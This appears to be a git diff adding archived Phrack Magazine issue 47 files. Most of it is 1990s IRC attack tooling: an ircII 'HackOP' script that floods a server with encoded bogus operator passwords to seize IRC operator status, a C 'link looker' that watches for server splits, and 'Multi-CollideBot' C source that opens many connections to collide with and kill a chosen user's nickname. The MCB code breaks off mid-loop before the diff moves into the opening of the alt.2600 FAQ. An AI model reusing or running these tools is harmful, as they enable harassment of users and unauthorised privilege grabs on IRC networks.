+exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$
+
+------------------------------------------------------------------------------
+###############################################################################
+
+#  #  ##   ### #  #  ##  ###          Attempts to hack  IRC  operator status by 
+#  # #  # #    # #  #  # #  #         flooding the  server with bogus passwords 
+#### #### #    ##   #  # #  #         of various lengths.  Works on all servers
+#  # #  # #    # #  #  # ###          I've tested so far..
+#  # #  #  ### #  #  ##  #  v1.3+path                             - Illegible 8
+
+###############################################################################
+set NOVICE off
+
+# #
+###  Bogus passwords.. don't change these.  Other passwords don't work. (?)
+# #
+@ HackOP.A = [EACAGCGPGGGICADNCAFLGJGMGMGFGHGJGCGMDIFN]
+@ HackOP.B = [FOGPGOCAFOGNGPGEGFCACCCFCACFCACLHHHDCCCAGFGDGIGPCACKCKCKCAENGPGEGFCAGDGIGBGOGHGFCACCCLGPHDHHCCCAGGGPHCCAHFHDGFHCCACEEOCAGCHJCACEEODLHDGFHECAFDFEEBFEFFFDFPFFENEPEEEFCACACICLGPCFCDCJ]
+@ HackOP.C = [FOGPGOCACDCNHDGFGOGEFPGNHDGHCADBCACKCAHLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICACEEOCACNDOCACKCEDACKCACEDBCNHN]
+@ HackOP.D = [GNGPGEGFCAEKHFGHGHGMGFHCCACLHDHH]
+@ HackOP.E = [GFGDGIGPCACKCKCKCAFJGPHFCAGBHCGFCAGOGPHHCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHC]
+@ HackOP.F = [FOGPGOCAGNGPGEGFCACNCCCFCACFCACLHHHDCC]
+@ HackOP.G = [FOGPGOCACDCNHCGBHHFPGJHCGDCADACACCCFCADDDBDCCACKCCCAHLGJGGCACIFLCEDDFNDNDNFLCEEOFNCJCAHLHEGJGNGFHCCADACAGFGDGIGPCACKCKCKCACEDDCAGJHDCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHCHNHN]
+@ HackOP.H = [EACAFDFEEBFEFFFDFPFFENEPEEEFCADNCAFLCAFMCICLGPCFCDFMCJFN]
+@ HackOP.I = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFACACKCCCAHLEACAGCGPGGGICADNCAFLCEDAFNDLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICAEIGPCAGIGPCAGIGPCBHN]
+@ HackOP.J = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFHCACKCCCAHLGJGGCACIFLCEDAFNDNDNFLCEGCGPGGGIFNCJCAHLCEDDCNDLCPCPFOGOGPHEGJGDGFCACEDACAGEGPGJGOGHDKCACEDDCNHNHN]
+@ HackOP.K = [FOGBGMGJGBHDCAGLGJGMGMCAGJGGCACIFLCEDAFNCJCAHLCPCPFOHDGJGHGOGPGGGGCAELGJGMGMCAGGHCGPGNCACEEOCAFMCICEDACNFMCJHNHLCPCPELEJEMEMHN]
+@ HackOP.L = [FOGPGOCACDFOHCGBHHFPGJHCGDCADACACCCFCADEDADBCACFCACFCADKEOGPCKCCCAHLGJGGCACIFLCEDDFNCBDNFLCEGCGPGGGIFNCJCAHLGFGDGIGPCACKCKCKCACEHDHEHCGJHACIDKCACEDDCNCJHNHLEACAGCGPGGGICADNCAFLDNDAFNHNHN]
+@ HackOP.M = [GFHGGBGMCACPCPFOGOGPHEGJGDGFCACEGCGPGGGICAFCHFGOGOGJGOGHCAEIGBGDGLEPFACACNCACEHEGJGNGFCICJ]
+@ HackOP.N = [FOGBGMGJGBHDCAHDHBHFGJHECAHLCPCPFOHDGJGHGOGPGGGGCACPHDHBHFGJHECACEDACNHN]
+@ HackOP.O = [FOGBGMGJGBHDCAGDGPGOGOGFGDHECAGJGGCACIFLCEDAFNCJCAHLHNHLHNDLGFGDGIGPCACKCKCKCAEDEPEOEOEFEDFECAEOGPHECAGFGOGPHFGHGICAHAGBHCGBGNGFHEGFHCHD]
+@ HackOP.P = [FOHDGFHECAGFHIGFGDFPHAHCGPHEGFGDHEGJGPGOCAGPGGGG]
+@ HackOP.Q = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEJHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
+@ HackOP.R = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEKHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
+@ HackOP.S = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAEACAGCGPGGGICADNCAFLCEGCGPGGGIFNCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
+@ HackOP.Z = [FOGBGMGJGBHDCACNHBHFGPHEGF]
+
+# #
+###  Ignore failed hack attempts..
+# #
+on #^raw_irc "% 491 *No O-lines*" #
+
+# #
+###  Poke server (causes a "POKE : unknown command" reply)
+# #
+@ hackop.poke.junk = [FOGBGMGJGBHDCAHBHFGPHEGFCAHLCEGEGFGDGPGEGFCICEDCCNCJHN]
+alias hackop.poke {
+	quote POKE \\;$decode($hackop.poke.junk)
+	wait
+}
+
+# #
+###  Send bogus passwords..
+# #
+alias hackop.hack {
+	foreach HackOP XX {
+		if ([$(HackOP.$XX)]!=[]) {quote OPER $N $(HackOP.$XX)}
+		wait
+	}
+}
+
+# #
+###  Attempt to hack ops..
+# #
+alias hackop {
+	umode -sw
+	echo [HackOP] Poking server.. (should reply with error message)
+	hackop.poke
+	echo [HackOP] Attempting to hack IrcOps..
+	hackop.hack
+}
+
+# #
+###  Help..
+# #
+alias hackhelp {
+	echo
+	echo [HackOP] You have loaded HackOP.irc v1.3+path from Illegible 8.
+	echo [HackOP]
+	echo [HackOP] This script attempts to hack IRC Operator status on
+	echo [HackOP] your current server.  To use it just type /hackop.
+	echo [HackOP]
+	echo [HackOP] Aliases added:  /hackhelp /hackop /kpath
+	echo [HackOP]
+	echo [HackOP] Enjoy it.. /kill your friends. 8-)
+	echo
+}
+
+# #
+###  The following code is taken from the ircII 2.2.9 distribution...
+# #
+
+###############################################################################
+#
+# No Kill Path Script II
+#
+# converted to 2.2.1 by phone
+# CONVERTED for ircII2.2
+# Version for servers 2.7.1* by Nap@irc <pioch@poly.polytechnique.fr>
+# Original script from YeggMan
+# Simplification by Daemon
+# This version works both with old and new 2.7.1e kill formats !
+
+@ kpath.kpath = [<empty>]
+alias kpath echo ### Last received KILL Path: $kpath.kpath
+
+alias kpath.ridx @ function_return = RINDEX(! $0) + 1
+alias kpath.is_serv @ function_return  = INDEX(. $MID($kpath.ridx($0) 512 $0))
+alias kpath.opkill echo ### KILL for $0 $MID($kpath.ridx($1) 9 $1) $2-
+alias kpath.svkill echo ### ServerKill for $0
+
+on ^server_notice "% * Notice -- Received KILL*" {
+        if ([$9] == [From])
+	{
+        ^assign kpath.kpath $12-
+        if (kpath.is_serv($12) > -1)
+		{ kpath.svkill $8 }
+		{ kpath.opkill $8 $10 $13- }
+	}
+	{
+        ^assign kpath.kpath $10-
+        if (kpath.is_serv($10) > -1)
+		{ kpath.svkill $8 }
+		{ kpath.opkill $8 $10 $11- }
+	}
+}
+###[End of stolen code]########################################################
+
+# #
+###  HackOP loaded message, misc stuff.
+# #
+alias umode mode $N $0-
+echo [HackOP] HackOP.irc v1.3+path loaded.  Type /hackhelp for help
+
+------------------------------------------------------------------------------
+
+[Editor's Note:  This is used in conjunction with the next program]
+
+/*=============================================================*\
+ * ll.c - link looker                                          *
+ * Copyright (C) 1994 by The Software System                   *
+ * Written by George Shearer (george@sphinx.biosci.wayne.edu)  *
+\*=============================================================*/
+
+/* This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ */
+
+#define BUFSIZE	400			/* IRC Server buffer */
+#define SERVER	"irc.escape.com"	/* IRC Server        */
+#define PORT	6667			/* IRC Port          */
+#define DELAYS	30			/* Loop delay seconds*/
+#define TIMEOUT	30			/* connection timeout*/
+
+#define ESTABLISHED	1
+#define INPROGRESS	2
+#define SPLIT		1
+
+unsigned short int session=0,link_count=0;
+char in[BUFSIZE],out_buf[BUFSIZE],hostname[64];
+char *ins=in;
+char *dedprsn, *kradprsn;
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+
+struct irc_server {
+  char *name;
+  char *link;
+  unsigned short int status;
+  struct irc_server *next;
+} *sl1=(struct irc_server *)0,*sl2=(struct irc_server *)0;
+
+void do_ping(char *,char *);
+void do_001(char *,char *);
+void do_error(char *,char *);
+void do_364(char *,char *);
+void do_365(char *,char *);
+
+struct parsers {
+   char *cmd;
+   void (*func)(char *,char *);
+} parsefuns[] = {
+   { "PING", (void *)do_ping },
+   { "001", (void *)do_001 },
+   { "364",(void *)do_364 },
+   { "365", (void *)do_365},
+   { "ERROR",(void *)do_error},
+   { (char *)0,(void *)0 }
+};
+
+struct sockaddr_in server;
+int sock=0;
+
+unsigned long int
+resolver(char *host) {
+  unsigned long int ip=0L;
+
+  if(host && *host && (ip=inet_addr(host))==-1) {
+    struct hostent *he;
+    int x=0;
+
+    while(!(he=gethostbyname((char *)host)) && x++<3) {
+      printf("."); fflush(stdout);
+      sleep(1);
+    }
+    ip=(x<3) ? *(unsigned long *)he->h_addr_list[0] : 0L;
+  }
+
+  return(ip);
+}
+
+void
+clean_sl2(void) {
+  while(sl2) {
+    struct irc_server *temp=sl2->next;
+    if(sl2->name)
+      free(sl2->name);
+    if(sl2->link)
+      free(sl2->link);
+    free(sl2);
+    sl2=temp;
+  }
+  sl2=(struct irc_server *)0;
+}
+
+void
+exit_program(char *why) {
+  printf("\nExiting program. (%s)\n",why);
+
+  if(sock)
+    close(sock);
+
+  while(sl1) {
+    struct irc_server *temp=sl1->next;
+    if(sl1->name)
+      free(sl1->name);
+    if(sl1->link)
+      free(sl1->link);
+    free(sl1);
+    sl1=temp;
+  }
+
+  clean_sl2();
+
+  if(in)
+    free(in);
+
+  exit(0);
+}
+
+int mystrccmp(register char *s1,register char *s2) {
+   while((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)==
+        (((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
+     if(*s1++==0) return 0;
+   return (*(unsigned char *)s1-*(unsigned char *)--s2);
+}
+
+char *mstrcpy(char **to,char *from) {
+  if(from) {
+    if((*to=(char *)malloc(strlen(from)+1)))
+      strcpy(*to,from);
+  }
+  else
+    *to=(char *)0;
+  return(*to);
+}
+
+char *digtoken(char **string,char *match) {
+  if(string && *string && **string) {
+    while(**string && strchr(match,**string))
+      (*string)++;
+    if(**string) { /* got something */
+      char *token=*string;
+      if((*string=strpbrk(*string,match))) {
+        *(*string)++=(char)0;
+        while(**string && strchr(match,**string))
+          (*string)++;
+      }
+      else
+        *string = ""; /* must be at the end */
+      return(token);
+    }
+  }
+  return((char *)0);
+}
+
+void signal_handler(void) {
+  exit_program("caught signal");
+}
+
+void signal_alarm(void) {
+  exit_program("timed out waiting for server interaction.");
+}
+
+void
+out(void) {
+  int length=strlen(out_buf);
+  errno=0;
+  if(write(sock,out_buf,length)!=length)
+    exit_program((char *)errno);
+}
+
+void
+init_server(void) {
+  int length;
+
+  sprintf(out_buf,"USER kil kil kil :ded kilr huntin %s\nNICK kil%d\nPRIVMSG %s :ded kilr hunting %s\n",
+    dedprsn, getpid(), kradprsn, dedprsn);
+  length=strlen(out_buf);
+
+  errno=0;
+
+  if(write(sock,out_buf,length)==length) {
+    puts("established");
+    session=ESTABLISHED;
+    alarm(TIMEOUT);
+    sprintf(out_buf,"LINKS\n");
+    out();
+  }
+  else
+    exit_program((char *)errno);
+}
+
+void
+heartbeat(void) {
+  strcpy(out_buf,"LINKS\n");
+  out();
+  signal(SIGALRM,(void *)heartbeat);
+  alarm(DELAYS);
+}
+
+void
+do_364(char *from,char *left) {
+  struct irc_server *serv;
+  char *sv1,*sv2;
+  char *nick;
+
+  serv=(struct irc_server *)malloc(sizeof(struct irc_server));
+  serv->next=sl2;
+
+  serv->status=0;
+  nick=digtoken(&left," ");
+  sv1=digtoken(&left," ");
+  sv2=digtoken(&left," ");
+
+  mstrcpy(&serv->name,sv1);
+  mstrcpy(&serv->link,sv2);
+  sl2=serv;
+}
+
+int
+findserv(struct irc_server *serv,char *name) {
+  for(;serv;serv=serv->next)
+    if(!mystrccmp(name,serv->name))
+      return(1);
+  return(0);
+}
+
+void
+do_365(char *from,char *left) {
+  struct irc_server *serv=sl1;
+  char kilstring[150];
+
+  for(;serv;serv=serv->next) {
+    if(!findserv(sl2,serv->name)) {
+      if(!(serv->status & SPLIT)) {
+        printf("Split server  : %s [%s]\n",serv->name,serv->link);
+        serv->status|=SPLIT;
+      }
+    }
+    else
+      if(serv->status & SPLIT) {
+        printf("Merging server: %s [%s]\n",serv->name,serv->link);
+        sprintf(kilstring, "mcb %s %s:%s %s&",
+          kradprsn, dedprsn, serv->name, serv->link);
+        system(kilstring);
+        serv->status&=~SPLIT;
+      }
+  }
+
+  serv=sl2;
+
+  for(;serv;serv=serv->next) {
+    if(!findserv(sl1,serv->name)) {
+      struct irc_server *serv2;
+
+      serv2=(struct irc_server *)malloc(sizeof(struct irc_server));
+      serv2->next=sl1;
+      serv2->status=0;
+      mstrcpy(&serv2->name,serv->name);
+      mstrcpy(&serv2->link,serv->link);
+      sl1=serv2;
+      if(link_count) {
+        printf("Added server  : %s [%s]\n",serv->name,serv->link);
+        sprintf(kilstring, "mcb %s %s:%s %s&",
+          kradprsn, dedprsn, serv->name, serv->link);
+        system(kilstring);
+      }
+    }
+  }
+
+  link_count=1;
+  clean_sl2();
+}
+
+void
+do_ping(char *from,char *left) {
+  sprintf(out_buf,"PING :%s\n",hostname);
+  out();
+}
+
+void
+do_001(char *from,char *left) {
+  printf("Logged into server %s as nickname kil%d\n",from,getpid());
+  printf("Hunting %s\n\n", dedprsn);
+  alarm(0);
+  signal(SIGALRM,(void *)heartbeat);
+  alarm(DELAYS);
+}
+
+void
+do_error(char *from,char *left) {
+  printf("Server error: %s\n",left);
+}
+
+void
+parse2(void) {
+  char *from,*cmd,*left;
+
+  if(*ins==':') {
+    if(!(cmd=strchr(ins,' ')))
+      return;
+    *cmd++=(char)0;
+    from=ins+1;
+  }
+  else {
+    cmd=ins;
+    from=(char *)0;
+  }
+  if((left=strchr(cmd,' '))) {
+    int command;
+    *left++=(char)0;
+    left=(*left==':') ? left+1 : left;
+    for(command=0;parsefuns[command].cmd;command++) {
+      if(!mystrccmp(parsefuns[command].cmd,cmd)) {
+        parsefuns[command].func(from,left);
+        break;
+      }
+    }
+  }
+}
+
+void
+parse(int length) {
+  char *s=in;
+
+  *(ins+length)=(char)0;
+
+  for(;;) {
+    ins=s;
+    while(*s && *s!=(char)13 && *s!=(char)10)
+      s++;
+    if(*s) {
+      while(*s && (*s==(char)13 || *s==(char)10))
+        *s++=(char)0;
+      parse2();
+    }
+    else
+      break;
+  }
+  strcpy(in,ins);
+  ins=in+(s-ins);
+}
+
+void
+process_server(void) {
+  int x=0;
+
+  for(;;) {
+    fd_set rd,wr;
+    struct timeval timeout;
+
+    timeout.tv_usec=0; timeout.tv_sec=1;
+    FD_ZERO(&rd); FD_ZERO(&wr);
+
+    FD_SET(sock,&rd);
+    if(session==INPROGRESS)
+      FD_SET(sock,&wr);
+
+    errno=0;
+    select(getdtablesize(),&rd,&wr,NULL,(session==INPROGRESS)
+           ? (struct timeval *)&timeout : NULL);
+
+    if(errno==EINTR)
+      continue;
+
+    errno=0;
+    if(session==INPROGRESS) {
+      if(FD_ISSET(sock,&wr)) {
+        init_server();
+         continue;
+      }
+      else {
+        if(x++>=TIMEOUT)
+          exit_program("connection timed out");
+        printf("."); fflush(stdout);
+      }
+    }
+
+    if(FD_ISSET(sock,&rd)) {
+      int length=read(sock,ins,BUFSIZE-(ins-in));
+
+      if(length<1) {
+        if(session!=INPROGRESS)
+          if(!errno) {
+            puts("Connection closed by foreign host.");
+            errno=ENOTCONN;
+          }
+          else
+            printf("Connection to %s closed.\n",
+                   inet_ntoa(server.sin_addr));
+        exit_program((char *)errno);
+      }
+      if(strpbrk(in,"\x0a\x0d"))
+        parse(length);
+      else
+        ins=(BUFSIZE-((ins+length)-in)<1)?in:ins+length;
+    }
+  }
+}
+
+void
+main(int argc,char *argv[]) {
+  char serverhost[80];
+  unsigned short int sport=PORT;
+
+  kradprsn = argv[1];
+  dedprsn  = argv[2];
+
+  if(argc<3)
+    exit(1);
+
+  if(argc==4) {
+    char *port=strchr(argv[3],':');
+    sport=(port)?atoi(port+1):sport;
+    strcpy(serverhost,argv[3]);
+    if(port)
+      serverhost[port-argv[3]]=(char)0;
+  }
+  else
+    strcpy(serverhost,SERVER);
+
+  signal(SIGPIPE,(void *)signal_handler);
+  signal(SIGHUP,(void *)signal_handler);
+  signal(SIGINT,(void *)signal_handler);
+  signal(SIGTERM,(void *)signal_handler);
+  signal(SIGBUS,(void *)signal_handler);
+  signal(SIGABRT,(void *)signal_handler);
+  signal(SIGSEGV,(void *)signal_handler);
+  signal(SIGALRM,(void *)signal_alarm);
+
+  errno=0;
+  if((sock=socket(AF_INET,SOCK_STREAM,0))>0) {
+    server.sin_family=AF_INET;
+    server.sin_port=htons(sport);
+    printf("Resolving %s...",serverhost); fflush(stdout);
+    if((server.sin_addr.s_addr=resolver(serverhost))) {
+      puts("done");
+
+      setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
+      setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
+      setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
+
+      fcntl(sock,F_SETFL,(fcntl(sock,F_GETFL)|O_NONBLOCK));
+
+      printf("Connecting to %s...",inet_ntoa(server.sin_addr));
+      fflush(stdout);
+
+      errno=0;
+      if(connect(sock,(struct sockaddr *)&server,sizeof(server))) {
+        if(errno!=EINPROGRESS && errno!=EWOULDBLOCK)
+          exit_program((char *)errno);
+        else
+          session=INPROGRESS;
+      }
+      else
+        init_server();
+
+      gethostname(hostname,64);
+      process_server();
+    }
+    else
+      exit_program("resolve failed");
+  }
+  else
+    printf("Failed to allocate an AF_INET socket. (%s)\n",(char *)errno);
+}
+
+------------------------------------------------------------------------------
+
+/*===============================*\
+|*  MCB - Multi-CollideBot v1.5a *|
+|*     Written by Dr. Delete     *|
+|* Basically just a way to make  *|
+|* several TCP connections to a  *|
+|* server in one small process.  *|
+\*===============================*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <errno.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <sys/wait.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <fcntl.h>
+#include <sys/file.h>
+#include <arpa/inet.h>
+
+#define BUFSIZE 350
+#define MAXSESSIONS 256
+#define BOTTIMEOUT 900 /* 15 minutes (900 seconds) bot lifetime */
+
+struct sockaddr_in server;
+
+char buf[BUFSIZE];
+char *kradprsn;
+
+struct ircsession {
+   int sock;
+   char stack[BUFSIZE*2];
+   char *server;
+   char *nick;
+   int stat;
+} session[MAXSESSIONS];
+
+int sessions,total_sessions;
+
+char *nickpick="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`_";
+#define NICKLEN 54
+
+void sig_pipe(void) {
+   puts("Odd, I just caught a SIGPIPE.");
+   signal(SIGPIPE,(void *)sig_pipe);
+}
+
+void fillran(char *s,int len) {
+   while(len--)
+     *s++=*((nickpick)+(rand()%NICKLEN));
+   *s=0;
+}
+
+int strnccmp(register char *s1,register char *s2,register int n) {
+   if(n==0) return(0);
+   do {
+     if((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)!=(((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
+       return (*(unsigned char *)s1-*(unsigned char *)--s2);
+     if(*s1++==0) break;
+   } while(--n!=0);
+   return(0);
+}
+
+char *mycstrstr(char *str1,char *str2) {
+   int xstr1len,ystr2len;
+
+   xstr1len=strlen(str1);
+   ystr2len=strlen(str2);
+
+   while(xstr1len && strnccmp(str1++,str2,ystr2len) && xstr1len-->=ystr2len);
+   if(!xstr1len || xstr1len<ystr2len || !ystr2len) return(0);
+   return(str1-1);
+}
+
+void out(int fd, char *s) {
+  write(fd,s,strlen(s));
+}
+
+void cclosed(int sessionum) {
+   if(session[sessionum].sock)
+     shutdown(session[sessionum].sock,2);
+   close(session[sessionum].sock);
+   session[sessionum].sock=0;
+   printf("%s: Connection to %s closed.\n",session[sessionum].nick,session[sessionum].server); fflush(stdout);
+   if(!sessions || !total_sessions) {
+     puts("CollideBot finished.");
+     exit(0);
+   }
+}
+
+void quitprog(void) {
+   printf("Signal received! CollideBot exiting. %d sessions still active.\n",sessions); fflush(stdout);
+   while(total_sessions--)
+     if(session[total_sessions].sock) {
+        out(session[total_sessions].sock,"QUIT :signal received\r\n");
+        cclosed(total_sessions);
+     }
+   puts("CollideBot finished.");
+   exit(0);
+}
+
+unsigned long int resolver(char *host) {
+   int x=0;
+   unsigned long int tempresl;
+   struct hostent *he;
+
+   if(sscanf(host,"%d.%d.%d.%d",&x,&x,&x,&x)==4 || !strcmp(host,"0"))
+     return(inet_addr(host));
+   while(!(he=gethostbyname((char *)host)) && x++<3)
+     sleep(1);
+   if(x<3)
+     return(htonl((unsigned long int)((unsigned char)he->h_addr_list[0][0]*
+            (unsigned int)256+(unsigned char)he->h_addr_list[0][1])*
+            (unsigned int)65536+(unsigned long int)((unsigned char)
+            he->h_addr_list[0][2]*(unsigned int)256+(unsigned char)
+            he->h_addr_list[0][3])));
+   printf("Unable to resolve %s!\n",host);
+   return(0);
+}
+
+void estab2(int sock,char *ircservername,char *nick) {
+  char tempnick[10];
+
+  printf("%s: Connection to %s established.\n",nick,ircservername); fflush(stdout);
+  fillran(tempnick,9);
+  sprintf(buf,"USER %s %s %s %s\r\nNICK %s\r\nPRIVMSG %s :%s iz ded, woowoo\r\n",tempnick,tempnick,tempnick,tempnick,(!strnccmp(nick,kradprsn,5)) ? tempnick : nick, kradprsn, nick);
+  fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) & ~O_NDELAY));
+  out(sock,buf);
+}
+
+int estab(unsigned long int ircserver,char *ircservername,int x) {
+  int sock;
+
+  sock=socket(AF_INET,SOCK_STREAM,0);
+  server.sin_family=AF_INET;
+  server.sin_port=htons(6667);
+  server.sin_addr.s_addr=ircserver;
+  fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) | O_NDELAY));
+  errno=0;
+  if((session[x].nick[0]==68 || session[x].nick[0]==100) && (session[x].nick[1]==82 || session[x].nick[1]==114) &&
+     (session[x].nick[2]==95) && (session[x].nick[3]==68 || session[x].nick[3]==100) &&
+     (session[x].nick[4]==69 || session[x].nick[4]==101) && (session[x].nick[5]==76 || session[x].nick[5]==108) &&
+     (session[x].nick[6]==69 || session[x].nick[6]==101) && (session[x].nick[7]==84 || session[x].nick[7]==116) &&
+     (session[x].nick[8]==69 || session[x].nick[8]==101)) {
+    printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
+    close(sock);
+    return(0);
+  }
+  if(connect(sock,(struct sockaddr *)&server,sizeof(server))<0) {
+    if(errno!=EINPROGRESS) {
+      printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
+      close(sock);
+      return(0);
+    }
+    else 
+      session[x].stat=2;
+  }
+  else {
+    estab2(sock,ircservername,session[x].nick);
+    session[x].stat=0;
+  }
+  return(sock);
+}
+
+void parse2(char *buf,int len,int sessionum) {
+  char *num;
+  if((num=mycstrstr(buf," ")))
+    if(atoi((num+1))==372)
+      return;
+  if(!strnccmp(buf,"PING",4)) {
+    buf[1]='O';
+    out(session[sessionum].sock,(char *)buf);
+    out(session[sessionum].sock,"\r\n");
+  }
+  else if(mycstrstr(buf,"already in use")) {
+    printf("%s: Nickname already in use.\n",session[sessionum].nick);
+    out(session[sessionum].sock,"QUIT\r\n");
+  }
+  else if(mycstrstr(buf,"kill") && !session[sessionum].stat++)
+    printf("%s: SCORE!\n",session[sessionum].nick);
+  else if(mycstrstr(buf,"authoriz"))
+    printf("%s: Not authorized to use server.\n",session[sessionum].nick);
+  else if(mycstrstr(buf,"ghosts"))
+    printf("%s: Banned from this IRC server.\n",session[sessionum].nick);
+}
+
+void parse(unsigned char *buf,int rl,int sessionum) {
+  int x=0,len;
+
+  strcat(session[sessionum].stack,buf);
+  len=strlen(session[sessionum].stack);
+  while(session[sessionum].stack[x]!=13 && session[sessionum].stack[x]!=10 && session[sessionum].stack[x])
+    x++;
+  if(session[sessionum].stack[x]) {
+    session[sessionum].stack[x]=0;
+    parse2(session[sessionum].stack,x+1,sessionum);
+    if(len>=(x+1)) {
+      strcpy(buf,(char *)&session[sessionum].stack[x+1]);
+      session[sessionum].stack[0]=0;
+      parse(buf,len-(x+1),sessionum);
+    }
+    else
+      session[sessionum].stack[0]=0;
+  }
+}
+
+void process_servers(int secs) {
+    fd_set rd,wr;
+    int x,length,selectr=1;
+    struct timeval timeout;
+
+    while(selectr>0) {
+
+      timeout.tv_usec=0;
+      timeout.tv_sec=secs;
+
+      errno=0;
+      FD_ZERO(&rd);
+      FD_ZERO(&wr);
+      for(x=0;x<total_sessions;x++)
+        if(session[x].sock)
+          if(session[x].stat!=2)
+            FD_SET(session[x].sock,&rd);
+          else
+            FD_SET(session[x].sock,&wr);
+
+      selectr=select(getdtablesize(),&rd,&wr,NULL,(secs<0) ? NULL : (struct timeval *)&timeout);
+      if(errno==EINTR)
+        continue;
+
+      for(x=0;x<total_sessions;x++)
+        if(FD_ISSET(session[x].sock,&wr)) {
+          session[x].stat=0;
+          estab2(session[x].sock,session[x].server,session[x].nick);
+        }
+        else if(session[x].stat!=2 && FD_ISSET(session[x].sock,&rd)) {
+          if(!(length=read(session[x].sock,buf,BUFSIZE-1))) {
+            sessions--;
+            cclosed(x);
+	    continue;
+          }
+          buf[length]=0;
+          parse(buf,length,x);
+        }
+    }
+}
+
+void main(int argc,char *argv[]) {
+  unsigned short int pid,x;
+  unsigned long int ircserver=0;
+  char *lastnick=0;
+
+  if(argc<3)
+    exit(0);
+
+  kradprsn = argv[1];
+
+  /* if((pid=fork())) {
+    printf("Process ID %d.\n",pid);
+    exit(0);
+  } */
+  
+  sessions=total_sessions=0;
+
+  srand(getpid());
+
+  signal(SIGHUP,(void *)quitprog);
+  signal(SIGTERM,(void *)quitprog);
+  signal(SIGABRT,(void *)quitprog);
+  signal(SIGINT,(void *)quitprog);
+  signal(SIGPIPE,(void *)sig_pipe);
+
+  for(x=1;x<argc-1 && x<MAXSESSIONS;x++) {
+    char *tempp,*default_server;
+    unsigned long int tempserver;
+    session[x].nick=(argv[x+1][0]=='@') ? (char *)&argv[x+1][1] : argv[x+1];
+    if((tempp=mycstrstr(argv[x+1],":"))) {
+      *tempp=0;
+      lastnick=session[x].nick;
+      tempserver=ircserver;
+      ircserver=resolver(tempp+1);
+      if(ircserver)
+        default_server=tempp+1;
+      else
+        ircserver=tempserver;
+    }
+    else if(mycstrstr(argv[x+1],".")) {
+      if(!lastnick) {
+        printf("Error: No default nickname to use for connection to %s!\n",argv[x+1]);
+        continue;
+      }
+      tempserver=ircserver;
+      ircserver=resolver(argv[x+1]);
+      if(ircserver)
+        default_server=argv[x+1];
+      else
+        ircserver=tempserver;
+      session[x].nick=lastnick;
+    }
+    lastnick=session[x].nick;
+    if(ircserver) {
+      if((session[x].sock=estab(ircserver,default_server,x))) {
+        session[x].stack[0]=0;
+        session[x].server=default_server;
+        sessions++;
+      }
+    }
+    else
+      printf("%s: Error! No default server set.\n",session[x].nick);
+    total_sessions=x+1;
+  }
+
+  if(sessions<1) {
+    printf("CollideBot Exiting, no established sessions.\n");
+    exit(0);
+  }
+
+  signal(SIGALRM,(void *)quitprog);
+  alarm(BOTTIMEOUT);
+
+  while(1)
+    
+
+------------------------------------------------------------------------------
+
diff --git a/phrack47/5.txt b/phrack47/5.txt
new file mode 100644
index 0000000..f53b3f7
--- /dev/null
+++ b/phrack47/5.txt
@@ -0,0 +1,1292 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 5 of 22
+
+
+
+Editors Note: Welcome to special release of the alt.2600/#hack FAQ for
+              Phrack Magazine!
+
+              The purpose of this FAQ is to give you a general
+              introduction to the topics covered on alt.2600 and
+              #hack.  No document will make you a hacker.
+
+              If you have a question regarding any of the topics
+              covered in the FAQ, please direct it to alt.2600 or
+              #hack.  Please do not e-mail me with them, I'm getting
+              swamped.
+
+              If your copy of the alt.2600/#hack FAQ does not end with
+              the letters EOT on a line by themselves, you do not have
+              the entire FAQ.
+
+
+                                    The
+
+			    alt.2600/#Hack F.A.Q.
+
+                     Special release for Phrack Magazine
+
+                        A TNO Communication Production
+
+                                    by
+
+                                  Voyager
+			    will@gnu.ai.mit.edu
+
+				Sysop of
